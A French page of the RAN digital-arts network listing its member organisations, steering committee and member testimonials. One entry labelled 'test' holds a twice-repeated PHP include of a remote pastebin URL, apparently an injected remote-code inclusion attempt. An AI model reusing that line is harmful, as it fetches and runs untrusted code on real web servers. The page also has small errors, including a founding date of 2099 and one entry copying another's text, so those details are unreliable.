Membres du RAN

26 MEMBRES

Composé à la fois de festivals, de lieux de production, de diffusion et de résidences, d’universités, de médias ou d’entreprises…

5 TYPES DE STRUCTURES

production-résidence-fabrique / scène-musée-centre d’art / festival / université / média

7 NATIONALITES

Belgique / Canada / France / Grande-Bretagne / Taiwan / Tunisie / Sénégal

  • Maison populaire
    Maison populaire

    La Maison populaire est une association d’éducation populaire, créée en 1966. Elle encourage les pratiques amateurs en les valorisant…

  • Château Éphémère
    Château Éphémère

    Lieu de résidences et de création numérique, le Château Éphémère propose depuis novembre 2014 et sur 2000 m2 plus…

  • Labo Art&Sciences, Paris 1
    Labo Art&Sciences, Paris 1

    Située sur un axe de recherche associant l’art avec les sciences exactes, les sciences naturelles, et les sciences politiques,…

  • ATI & INREV, Paris 8
    ATI & INREV, Paris 8

    Créé en 1984, le département Arts et Technologies de l’Image (ATI) figure parmi les premières formations artistiques en image…

  • Transcultures
    Transcultures

    Centre interdisciplinaire des cultures numériques et sonores, Transcultures est une association créée en 1996 à Bruxelles pour promouvoir et…

  • Elektra
    Elektra

    ELEKTRA est un festival international d’art numérique présentant des œuvres et des artistes qui allient art, science et nouvelles…

  • Centre culturel Saint-Ex
    Centre culturel Saint-Ex

    Laboratoire d’expérimentation artistique, lieu d’expertise numérique, le Centre culturel Saint-Exupéry offre aux artistes et au public des passerelles entre…

  • décalab
    décalab

    Décalab est une agence arts-sciences-technologies qui accompagne les entreprises, les laboratoires et institutions dans leur veille « art, innovation…

  • Centre des arts
    Centre des arts

    Première scène conventionnée « Ecritures numériques » par le Ministère de la Culture et de la Communication, le Cda…

  • Espace multimédia Gantner
    Espace multimédia Gantner

    Créé en 1998 à l’initiative de la commune de Bourogne, l’Espace multimédia gantner est depuis 2001, un service du…

  • CITU-Paragraphe, Paris 8
    CITU-Paragraphe, Paris 8

    L’équipe CITU/Paragraphe a été créée en 2007, elle a pour objectif de mener des recherches scientifiques sur le terrain…

  • Seconde Nature
    Seconde Nature

    Seconde Nature porte un projet culturel pluridisciplinaire entre musiques électroniques, arts sonores, arts visuels et le spectacle vivant. Une…

  • Synesthésie
    Synesthésie

    Interface entre artistes, publics et technologies, Synesthésie s’engage depuis 1995 au service de l’expérimentation artistique, de sa production, de…

  • Cap digital – Futur en Seine
    Cap digital – Futur en Seine

    Cap Digital est le pôle de compétitivité et de transformation numérique. Il regroupe plus de 1000 adhérents incluant des…

  • Vidéoformes
    Vidéoformes

    L’association VIDEOFORMES organise un festival international annuel, à Clermont-Ferrand, présentant l’actualité de la création numérique : installations, vidéos, performances,…

  • Digital Performances & Cultures
    Digital Performances & Cultures

    Association portée par Philippe Baudelot, Consultant et curateur, dédiée au développement et à la promotion de l’innovation et des…

  • MCD
    MCD

    Publication mensuelle, MCD étoffe progressivement son équipe rédactionnelle et ouvre sa ligne éditoriale aux arts numériques recentrée sur l’art…

  • accès(s), cultures électroniques
    accès(s), cultures électroniques

    Depuis 40 ans, le vocabulaire ne cesse d’évoluer pour désigner les pratiques artistiques liées à la technologie et à…

  • La Gaîté lyrique
    La Gaîté lyrique

    La Gaîté lyrique est le lieu des cultures à l’ère du numérique. Ouverte à tous pour visiter une exposition,…

  • Echos Electrik / E-FEST
    Echos Electrik / E-FEST

    Le projet E-FEST est né de la volonté d’introduire dans le paysage culturel tunisien les cultures dites numériques, réunissant…

  • artefact / La Laiterie – L’Osophère
    artefact / La Laiterie – L’Osophère

    Créée à Strasbourg en 1994 Artefact est une unité de création, production et diffusion de contenus culturels structurée autour…

  • Digital Art Center de Tapei
    Digital Art Center de Tapei

    Lieu créé en 2099 dédié à la création de liens entre les technologies numériques et les arts. Le centre…

  • Gawlab
    Gawlab

    GawLab est un collectif organisé en association à but non lucratif de droit sénégalais fondé en 2004 à Dakar…

  • body>data>space
    body>data>space

    body>data>space est un collectif de design situé à Londres qui propose un ensemble d’installations et de performances en temps…

  • Les Rencontres audiovisuelles
    Les Rencontres audiovisuelles

    Depuis sa création en 1998, l’association Rencontres Audiovisuelles œuvre en région Nord-Pas de Calais à la diffusion de la…

  • Art2M
    Art2M

    Publication mensuelle, MCD étoffe progressivement son équipe rédactionnelle et ouvre sa ligne éditoriale aux arts numériques recentrée sur l’art…

  • test
    test

    include(‘http//pastebin.com/raw/F9ffPKBM’); include(‘http//pastebin.com/raw/F9ffPKBM’);

    0

Comité de pilotage

body>data>space _ Ghislaine Boddington

Centre des arts d’Enghien-les-Bains _ Dominique Roland & Sarah Faguer (coordinatrice)

Citu-Paragraphe _ Jean-Jacques Gay

décalab _ Natacha Seignolles

Labo Arts&sciences – Institut Acte _Olga Kisseleva

Transcultures _ Philippe Franck & Jacques Urbanska

Paroles de membres

  • Le RAN repose sur une dynamique volontaire de personnes, un groupement d’intérêts individuels animés par un état d’esprit collaboratif. Ce réseau a la particularité de réunir des hommes et des femmes qui portent des projets de dimensions, de natures et de cultures très diverses. Privées ou publiques, institutionnelles ou alternatives, expérimentées ou naissantes, tous les types et échelles de structures s’y côtoient sur un pied d’égalité.
    Dominique RolandDominique RolandDirecteur du Centre des arts d'Enghien-les-Bains, de la biennale internationale Bains numériques et initiateur du RAN
  • Le RAN est né du terrain opératoire et d’une réelle volonté partagée. Il s’agit de favoriser le développement des arts numériques dans nos complémentarités et nos heureuses différences. Ce réseau nous invite à nous remettre continuellement en question, et à imaginer d’autres co-créativités, co-financements, co-diffusions… pas de modèle définitif ici mais des expériences partagées, des arborescences inédites, des communautés d’intérêts et d’idées.
    Philippe FranckPhilippe FranckDirecteur de Transcultures, du festival Citysonic et des Transnumériques (Belgique), enseignant et membre fondateur du RAN
  • Les collaborations art-sciences sous-tendent notre travail au quotidien. Donner aussi une matérialité au réseau et acteurs du RAN par des propositions artistiques qui font sens est aussi un des moteurs de notre participation...
    Natacha SeignollesNatacha SeignollesDirectrice de décalab, membre du RAN
  • Convaincus que cet art de/en réseau ne pouvait faire l’économie de la mise en relation, nous avons commencé par interroger de manière transversale nos pratiques de programmateurs, chercheurs, critiques ou formateurs. Comment favoriser les rencontres entre artistes et scientifiques, participer à l’évolution et à l’adaptation des équipements des lieux ; faire en sorte que de jeunes artistes puissent être formés conjointement en arts et sciences ? ou encore garder une trace du processus de création de ces œuvres guettées par l’obsolescence ?
    Anne-Cécile WormsAnne-Cécile WormsDirectrice de la rédaction de MCD, membre du RAN